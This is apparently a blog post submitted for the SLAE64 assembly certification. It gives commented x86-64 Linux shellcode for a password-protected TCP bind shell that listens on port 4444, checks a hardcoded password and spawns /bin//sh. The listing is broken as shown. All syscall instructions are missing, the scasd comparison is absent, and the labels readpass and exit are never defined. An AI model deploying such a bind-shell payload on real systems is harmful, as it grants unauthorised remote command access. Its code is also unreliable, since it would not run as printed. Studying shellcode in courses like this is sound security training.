SLAE64 Assignment 1 - password protected tcp bindshell

; name       : bindshell
; author     : Sandro "guly" Zaccarini SLAE64-1497
; purpose    : this program will open a listening socket on, waits for connection
;              and spawn a shell if the first 4chars match an hardcoded password
;              this code has been written for SLAE64 assignment 1
; references : ,
;              /usr/include/linux/net.h
; license    : CC-BY-NC-SA
; high level flow:
; socket -> bind -> listen -> accept -> password check -> dup fd -> spawn /bin//sh

; known issues:
; 1) doesn't handle multiple clients
; 2) doesn't handle client-close and so_reuseaddr
; 3) doesn't handle "bruteforce", but i see this as a plus: i can try again if i fail
;    the password. i'm not worried about bruteforce here
; 4) the password cannot be longer than 8bytes, for >4bytes you should change e* to r*
; 5) password can only be a valid string
; 6) \r\n are not handled, but you can write guly 42 times and first or later you'll have it :)

  global _start

  section .text
; define placed before _start to have it "rel"able without jmp
PASSWORD: db "guly" ; 0x796c7567
PORT:     db 0x11,0x5c  ; 4444

; neat exit on top, not really needed
xor rax,rax
mov rdi,rax
mov al,0x3C

; create a TCP socket
; sock = socket(AF_INET, SOCK_STREAM, 0)
; rdi => AF_INET = 2
; rsi => SOCK_STREAM = 1
; rax => syscall number 0x29

; starting with a known null at rax,rdx,rdi and rsi
; even if not that readable, using push/pop i can save some bytes against mov
xor rax,rax
push rax
pop rdx
push rax
pop rdi
push rax
pop rsi

; and because everything's 0x, i can add or inc working with 8/32bit to save some bytes
add al, 0x29
add edi, 0x2
inc esi

; syscall rets socketfd to rax. copy it to edi, we need it for the whole process
; again, working with 32bit to save some bytes
mov edi, eax

; fire a bind() to created socket
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; where struct is built like this:
; server.sin_family = AF_INET => 0x2
; server.sin_port = htons(PORT) => defined in PORT
; server.sin_addr.s_addr = INADDR_ANY => => 0x0
; bzero(&server.sin_zero, 8)
; rdi => socketfd, saved at edi actually
; rsi => pointer to struct
; rdx => addr len, fixed at 0x10
; rax => syscall number 0x31

; create the struct, starting with a known null at rsp
; rsp => 0x00000000
xor rax, rax
push rax
; rsp => 0x0000000000000000

; mov AF_INET
mov byte [rsp], 0x2
; rsp => 0x00000000000002

; and mov port
mov ax, [rel PORT]
mov word [rsp+0x2], ax
; rsp => 0x0000005c110002
; and place pointer to rsi
mov rsi, rsp

; syscall id to rax using r12 which is zero
mov r12b, 0x31
mov eax,r12d

; addrlen, 16 or 0x10
mov dl, 0x10

; and do the bind()

; a bind with no listen is useless, let's listen
; listen(sock, MAX_CLIENTS)
; rdi => socketfd, already in rdi
; rsi => 0x1, accept just 1 client
; rax => syscall number 0x32

; start with a null rax/rsi
xor rax,rax
push rax
pop rsi
add ax, 0x32
inc esi

; and again, a listen with no accept is useless
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; rdi => socketfd, already in rdi
; rsi => pointer to sockaddr struct
; rdx => pointer to addr len, fixed to 0x10 (16)
; rax => syscall number 0x2b

; work with ops as small as possible
xor rax,rax
mov al, 0x2b
; make some room, hoping that upper stack is empty...
; to have an empty 16bytes i've could also:
; dec esi ; to have esi 0x0
; push rsi

sub rsp, 0x10
mov rsi, rsp
mov byte [rsp-1], 0x10
sub rsp, 0x1
mov rdx, rsp


; save the client socket file descriptor, r9 is unused
mov r9, rax

; read password from connected client using read() syscall 0x0
; and store in rsp
; rdi => client fd
; syscall is 0x0, so a xor will be perfect
; i also need to move a small value to rdx, i zero it too
xor rdx, rdx
mov rax,rdx

; to have some room for the read, i'm pushing a full null here
push rdx

; because i known my pass is just 0x4 chars, i force it here.
; see description for possible issue
mov dl, 0x4

; and put the pointer to the stack to rsi
mov rsi, rsp
mov rdi,r9

; do the read

; move my pass to eax, because i know it will fit. for longer pass, use rax.
; for even longer pass, scasd will not be the right op
mov eax, [rel PASSWORD]
; because client's password has been stored in rsp, move a pointer to rdi
mov rdi,rsp
; scasd will check 4byte from eax to edi pointed memory location

; if doesn't match, back to readpass. using this "loop" i can fail password and have
; the shell listening again.
; as i said in the description, i don't care about bruteforce and that's why no counter
jne readpass

; if the pass matches, dup2 to have some fd for the shell
; dup2 (new, old)
xor eax,eax
xor rsi,rsi
mov rdi, r9
mov al, 0x21

mov al, 0x21
inc rsi

mov al, 0x21
inc rsi

; and finally, execve
; rdi => pointer to filename, /bin//sh null terminated
; rsi => pointer to argv
; rdx => pointer to envp, null
; rax => syscall id 0x3b

; push a null terminator
xor rax, rax
push rax
; pointer to 0x0 for envp
mov rdx,rsp

; and push /bin//sh in reverse
mov rbx, 0x68732f2f6e69622f
push rbx

; finally store pointer to rdi and rsi
mov rdi, rsp
push rax
push rdi
mov rsi, rsp

; do the call
add rax, 0x3b

call exit

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Written on September 2, 2019